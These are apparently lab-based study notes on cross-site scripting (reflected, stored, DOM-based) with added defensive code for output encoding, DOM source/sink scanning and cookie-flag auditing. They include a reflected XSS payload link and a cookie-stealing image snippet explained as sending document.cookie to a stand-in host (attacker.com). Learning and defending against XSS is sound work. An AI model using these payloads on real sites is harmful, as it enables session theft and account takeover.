XSS

Types

Reflected

You see reflected variants when the injected input is immediately echoed back in the response. Imagine a toy search function in an online toy store; you search via:

https://trygiftme.thm/search?term=gift

But imagine you send this to your friend who is looking for a gift for their nephew (please don't do this):

https://trygiftme.thm/search?term=<script>alert( atob("VEhNe0V2aWxfQnVubnl9") )</script>

If your friend clicks on the link, their browser executes the injected script instead of just showing search results.

Impact

An attacker could do, view, or modify anything that your friend (or any other user who clicks the link) can do, view, or access. It is usually exploited via phishing: the victim is tricked into clicking a link that carries the malicious code.

Stored

A Stored XSS attack occurs when malicious script is saved on the server and then loaded for every user who views the affected page. Unlike Reflected XSS, which targets individual victims, Stored XSS is a "set-and-forget" attack: anyone who loads the page runs the attacker's script.

To understand how this works, let’s use the example of a simple blog where users can submit comments that get displayed below each post.

Normal Comment Submission

POST /post/comment HTTP/1.1
Host: tgm.review-your-gifts.thm

postId=3
name=Tony Baritone
[email protected]
comment=This gift set my carpet on fire but my kid loved it!

The server stores this information and displays it whenever someone visits that blog post.

Malicious Comment Submission (Stored XSS Example)

If the application does not sanitize or filter input, an attacker can submit JavaScript instead of a comment:

Because the comment is saved in the database, every user who opens that blog post will automatically trigger the script.

This lets the attacker run code as if they were the victim in order to perform malicious actions such as:

  • Steal session cookies

  • Trigger fake login popups

  • Deface the page
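The fix for both the reflected search term above and the stored comment is the same: encode untrusted data for the HTML context it is written into, at output time. The following is an added example, not code from the original notes or from the TryHackMe rooms they describe; the function names and the sample term and comments are constructed. The vulnerable renderers paste the input straight into markup (the pattern the notes describe); the hardened ones encode it first.

```javascript
// Added example, not code from the original notes: encoding untrusted input for
// the HTML text context before it is reflected (search term) or stored and
// re-displayed (blog comment). All names and sample values are constructed.

// The five characters that can change meaning inside HTML text or attributes.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode a value so the browser renders it as text rather than parsing it as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// VULNERABLE (reflected): the search term from the query string is pasted straight
// into the response, so a term containing a <script> tag is executed by the browser.
function renderSearchUnsafe(term) {
  return `<h1>Results for ${term}</h1>`;
}

// HARDENED (reflected): the same page with the term encoded for HTML text.
function renderSearchSafe(term) {
  return `<h1>Results for ${escapeHtml(term)}</h1>`;
}

// VULNERABLE (stored): a saved comment is concatenated into the post page for
// every visitor, so one hostile comment runs for everyone who loads the post.
function renderCommentUnsafe(comment) {
  return `<div class="comment"><b>${comment.name}</b>: ${comment.text}</div>`;
}

// HARDENED (stored): every untrusted field is encoded at output time. Encoding at
// output, rather than relying on input filtering, protects regardless of how the
// data got into the database.
function renderCommentSafe(comment) {
  return `<div class="comment"><b>${escapeHtml(comment.name)}</b>: ${escapeHtml(comment.text)}</div>`;
}

// Check used below: does the produced HTML still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input (not from the page).
const BENIGN_COMMENT = {
  name: "Tony Baritone",
  text: "This gift set my carpet on fire but my kid loved it!",
};
const HOSTILE_COMMENT = {
  name: "anyone",
  text: "<script>alert(1)</script>",
};
const HOSTILE_TERM = "<script>alert(1)</script>";

console.log("unsafe search: ", renderSearchUnsafe(HOSTILE_TERM));
console.log("safe search:   ", renderSearchSafe(HOSTILE_TERM));
console.log("unsafe comment:", renderCommentUnsafe(HOSTILE_COMMENT));
console.log("safe comment:  ", renderCommentSafe(HOSTILE_COMMENT));
```

escapeHtml is only correct for HTML text and quoted attribute values. Data written into a JavaScript string, a URL, or a CSS value needs the encoder for that context; a template engine with context-aware auto-escaping does this for you and is the better default.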

DOM Based

The injection happens entirely inside the page's own client-side JavaScript, which reads attacker-controlled input and writes it into the document; nothing is sent to the server.

Test Payloads

DOM Based

Nothing is sent to the server; the payload is handled by client-side JavaScript only, so server logs and server-side filters never see it.
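Because a DOM-based payload never reaches the server, finding it means reviewing the client-side code for places where an attacker-controlled source (URL fragment, query string, referrer) flows into an HTML-writing sink. The following is an added example, not code from the original notes: a small static check that flags lines where a known source and a known sink appear together. The source and sink lists, and the sample client script, are constructed for illustration.

```javascript
// Added example, not code from the original notes: flag client-side JavaScript
// lines where a DOM source that an attacker controls feeds an HTML-writing sink.
// Source/sink lists and the sample snippet are constructed for illustration.

// Values an attacker can set by crafting a link or a referring page.
const DOM_SOURCES = [
  { name: "location.hash", re: /\blocation\.hash\b/ },
  { name: "location.search", re: /\blocation\.search\b/ },
  { name: "location.href", re: /\blocation\.href\b/ },
  { name: "document.URL", re: /\bdocument\.URL\b/ },
  { name: "document.referrer", re: /\bdocument\.referrer\b/ },
  { name: "window.name", re: /\bwindow\.name\b/ },
];

// APIs that parse a string as HTML or code. textContent is deliberately absent:
// it writes text, not markup, and is the safe replacement for innerHTML.
const DOM_SINKS = [
  { name: "innerHTML", re: /\binnerHTML\b/ },
  { name: "outerHTML", re: /\bouterHTML\b/ },
  { name: "insertAdjacentHTML", re: /\binsertAdjacentHTML\b/ },
  { name: "document.write", re: /\bdocument\.write(?:ln)?\s*\(/ },
  { name: "eval", re: /\beval\s*\(/ },
];

// Return one finding per line that mentions both a source and a sink.
// Limitation: this is line-local, so a value copied into a variable on one
// line and written to a sink on a later line is not caught.
function findDomXssCandidates(source) {
  const findings = [];
  source.split("\n").forEach((line, idx) => {
    const src = DOM_SOURCES.find((s) => s.re.test(line));
    const sink = DOM_SINKS.find((s) => s.re.test(line));
    if (src && sink) {
      findings.push({ line: idx + 1, source: src.name, sink: sink.name, code: line.trim() });
    }
  });
  return findings;
}

// Constructed sample client script (not from the page). Line 3 and line 5 are
// the risky ones; line 4 uses textContent and is fine.
const SAMPLE_CLIENT_JS = `
const params = new URLSearchParams(location.search);
document.getElementById("term").innerHTML = "Results for " + location.search.slice(6);
document.getElementById("term").textContent = params.get("term");
document.write("<p>You came from " + document.referrer + "</p>");
`;

for (const f of findDomXssCandidates(SAMPLE_CLIENT_JS)) {
  console.log(`line ${f.line}: ${f.source} -> ${f.sink}: ${f.code}`);
}
```

A line-local scan is a triage aid, not proof: it produces false negatives when the flow spans several lines and false positives when the value is encoded before it reaches the sink. Each hit is a place to read by hand and, where the sink is innerHTML, to replace with textContent or a DOM API that sets text rather than markup.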

Stored XSS

First check for HTML injection (whether submitted markup is rendered unescaped)

Then go for XSS

Add /? to the link so that the cookie value is sent as a query parameter

  • var i = new Image;

    • Creates a new Image object in JavaScript. This is commonly used to send data to a server without triggering any visible browser behavior.

  • i.src = "" + document.cookie;

    • Sets the image's source URL to the contents of document.cookie, which is a string containing all the cookies available to the current page.

    • Since the URL is empty (""), this won't actually send the cookie anywhere, but if the empty string was replaced with a URL (e.g., http://attacker.com?c=), it would send the cookie to the attacker’s server.
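The defensive counterpart to the document.cookie explanation above is to check which of an application's cookies a script running in the page could read at all: a cookie set with the HttpOnly attribute is never exposed through document.cookie. The following is an added example, not code from the original notes: it parses Set-Cookie headers and reports cookies that lack HttpOnly (and the Secure and SameSite attributes). The sample headers are constructed.

```javascript
// Added example, not code from the original notes: audit Set-Cookie headers for
// cookies that an injected script could read through document.cookie.
// The sample headers are constructed for illustration.

// Parse one Set-Cookie header value into its name and the attributes we care about.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const attrMap = {};
  for (const attr of attrs) {
    if (!attr) continue;
    const [k, v] = attr.split("=");
    // Flag attributes (HttpOnly, Secure) have no value; store them as true.
    attrMap[k.trim().toLowerCase()] = v === undefined ? true : v.trim();
  }
  return {
    name,
    httpOnly: attrMap.httponly === true,
    secure: attrMap.secure === true,
    sameSite: typeof attrMap.samesite === "string" ? attrMap.samesite : null,
  };
}

// Report what is missing on a cookie. readableByScript is the property that
// matters for the document.cookie pattern: without HttpOnly the value is visible
// to any script that runs in the page, injected or not.
function auditCookie(header) {
  const c = parseSetCookie(header);
  const missing = [];
  if (!c.httpOnly) missing.push("HttpOnly");
  if (!c.secure) missing.push("Secure");
  if (!c.sameSite) missing.push("SameSite");
  return { name: c.name, readableByScript: !c.httpOnly, missing };
}

// Names of all cookies, from a list of Set-Cookie headers, that document.cookie would expose.
function cookiesReadableByScript(headers) {
  return headers
    .map(auditCookie)
    .filter((a) => a.readableByScript)
    .map((a) => a.name);
}

// Constructed sample response headers (not from the page).
const SAMPLE_SET_COOKIE_HEADERS = [
  "session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
  "theme=dark; Path=/",
  "auth=tok456; Secure",
];

for (const h of SAMPLE_SET_COOKIE_HEADERS) {
  const a = auditCookie(h);
  console.log(`${a.name}: readable by script=${a.readableByScript}, missing=[${a.missing.join(", ")}]`);
}
```

HttpOnly limits the damage of an injection; it does not fix it. A script that runs in the victim's page still executes with the victim's session and can make authenticated requests without ever reading the cookie, so the attributes belong alongside output encoding, not in place of it.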
